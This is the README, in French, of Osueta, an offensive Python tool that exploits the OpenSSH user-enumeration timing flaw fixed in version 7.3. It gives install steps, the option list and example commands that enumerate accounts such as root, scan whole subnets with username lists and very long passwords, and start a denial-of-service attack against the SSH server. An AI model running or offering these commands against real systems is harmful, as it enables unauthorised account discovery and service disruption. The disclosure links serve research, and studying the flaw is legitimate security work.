
Un simple script Python pour exploiter l'attaque temporelle d'énumération d'utilisateurs OpenSSH.
* ___ ___ ___ _ _ *
* / _ \ _ __ ___ _ _ / __/ __| || | *
* | (_) | '_ \/ -_) ' \\__ \__ \ __ | *
* \___/| .__/\___|_||_|___/___/_||_| *
* |_| *
* _ _ ___ _ _ *
* | | | |___ ___ _ _ | __|_ _ _ _ _ __ ___ _ _ __ _| |_(_)___ _ _ *
* | |_| (_-</ -_) '_| | _|| ' \ || | ' \/ -_) '_/ _` | _| / _ \ ' \ *
* \___//__/\___|_| |___|_||_\_,_|_|_|_\___|_| \__,_|\__|_\___/_||_| *
* *
* _____ _ _ _ _ _ _ *
* |_ _(_)_ __ (_)_ _ __ _ /_\| |_| |_ __ _ __| |__ *
* | | | | ' \| | ' \/ _` | / _ \ _| _/ _` / _| / / *
* |_| |_|_|_|_|_|_||_\__, | /_/ \_\__|\__\__,_\__|_\_\ *
* |___/ *
***************************************************************************
Osueta est un simple script Python2 pour exploiter l'attaque temporelle d'énumération d'utilisateurs OpenSSH,
présente dans les versions OpenSSH <= 7.2 et >= 5.*. Le script a la capacité de faire des variations
du nom d'utilisateur utilisé dans l'attaque par force brute, et la possibilité d'établir
une condition DOS dans le serveur OpenSSH.
http://seclists.org/fulldisclosure/2013/Jul/88
Le bug a été corrigé dans la version OpenSSH 7.3 :
http://www.openssh.com/txt/release-7.3
c0r3dump3d | coredump<@>autistici.org
rofen | rofen<@>gmx.de
Nous tenons à remercier Javier Nieto de www.behindthefirewalls.com pour son soutien et son aide.
Comme d'autres outils offensifs, les auteurs déclinent toute responsabilité quant à l'utilisation de ce script.
Debian :
# apt-get install python-ipy python-nmap
# pip install paramiko
# pip install IPy
ArchLinux :
# pacman -S python2-ipy python2-nmap python2-paramiko
$ git clone https://github.com/c0r3dump3d/osueta.git
usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
[-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
[-c VERS] [--dos DOS] [-t THREADS]
Script Python d'attaque temporelle d'énumération d'utilisateurs OpenSSH
arguments optionnels :
-h, --help affiche ce message d'aide et quitte
-H HOST Adresse IP ou bloc CIDR de l'hôte.
-k HFILE Fichier contenant la liste des hôtes.
-f FQDN FQDN à attaquer.
-p PORT Port de l'hôte.
-L UFILE Fichier de liste de noms d'utilisateurs.
-U USER Utiliser un seul nom d'utilisateur.
-d DELAY Délai fixe en secondes. Sinon, le délai est calculé.
-v VARI Faire des variations du nom d'utilisateur (par défaut oui).
-o OUTP Fichier de sortie avec les résultats positifs.
-l LENGTH Longueur du mot de passe en caractères (x1000) (par défaut 40).
-c VERS Vérifier ou non la version OpenSSH (par défaut oui).
--dos DOS Tenter une attaque DOS (par défaut non).
-t THREADS Threads pour l'attaque DOS (par défaut 5).
* Tentative d'énumération d'un seul utilisateur avec variations du nom d'utilisateur :
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
* Tentative d'énumération d'un seul utilisateur sans variations du nom d'utilisateur et avec une attaque DOS :
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
* Scan d'un réseau classe C avec un seul utilisateur :
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
* Scan d'un réseau classe C avec des noms d'utilisateurs depuis un fichier, délai de 15 secondes et un mot de passe de 50000 caractères :
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50